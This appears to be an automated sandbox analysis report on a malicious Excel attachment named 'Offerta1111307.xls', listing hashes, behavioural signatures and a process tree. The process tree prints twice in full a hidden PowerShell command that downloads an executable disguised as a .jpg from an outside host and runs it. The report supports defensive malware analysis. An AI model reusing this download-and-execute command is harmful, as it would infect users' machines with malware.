Analysis
-
max time kernel
137s -
max time network
140s -
platform
windows10_x64 -
resource
win10 -
submitted
07-07-2020 12:42
Static task
static1
Behavioral task
behavioral1
Sample
Offerta1111307.xls
Resource
win7
Behavioral task
behavioral2
Sample
Offerta1111307.xls
Resource
win10
General
-
Target
Offerta1111307.xls
-
Size
171KB
-
MD5
56efde4b17b8076c0f1f8c2491b3b00d
-
SHA1
4212e1fe7bc45ad8f91986445b380d0cfb68ef42
-
SHA256
79e42e4da20588bed383670a9af00056e8cc99fcc2353d7a2f5a24ddc2eed66a
-
SHA512
355f83c150b288b54e4e0f347cafcd6d7fc7c1740c62fd357e8e72d2abab08abb85c93690cc2209f37f56cee77f45d14eb9d91779a65a16fdd77fe5f32bdcf05
Malware Config
Extracted
http://crogtrt.com/IG/6591111307.jpg
Signatures
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 716 EXCEL.EXE 716 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exedescription pid process target process PID 716 wrote to memory of 3352 716 EXCEL.EXE cmd.exe PID 716 wrote to memory of 3352 716 EXCEL.EXE cmd.exe PID 3352 wrote to memory of 2212 3352 cmd.exe powershell.exe PID 3352 wrote to memory of 2212 3352 cmd.exe powershell.exe PID 2212 wrote to memory of 3672 2212 powershell.exe chrone.exe PID 2212 wrote to memory of 3672 2212 powershell.exe chrone.exe PID 2212 wrote to memory of 3672 2212 powershell.exe chrone.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 2212 powershell.exe Token: SeRestorePrivilege 4268 WerFault.exe Token: SeBackupPrivilege 4268 WerFault.exe Token: SeDebugPrivilege 4268 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exepid process 2212 powershell.exe 2212 powershell.exe 2212 powershell.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe 4268 WerFault.exe -
Executes dropped EXE 1 IoCs
Processes:
chrone.exepid process 3672 chrone.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4268 3672 WerFault.exe chrone.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE 716 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3352 716 cmd.exe EXCEL.EXE -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 2212 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 716 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Offerta1111307.xls"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
PID:716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/6591111307.jpg',$env:Temp+'\chrone.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\chrone.exe')2⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
PID:3352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/6591111307.jpg',$env:Temp+'\chrone.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\chrone.exe')3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\chrone.exe"C:\Users\Admin\AppData\Local\Temp\chrone.exe"4⤵
- Executes dropped EXE
PID:3672 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 8925⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Program crash
PID:4268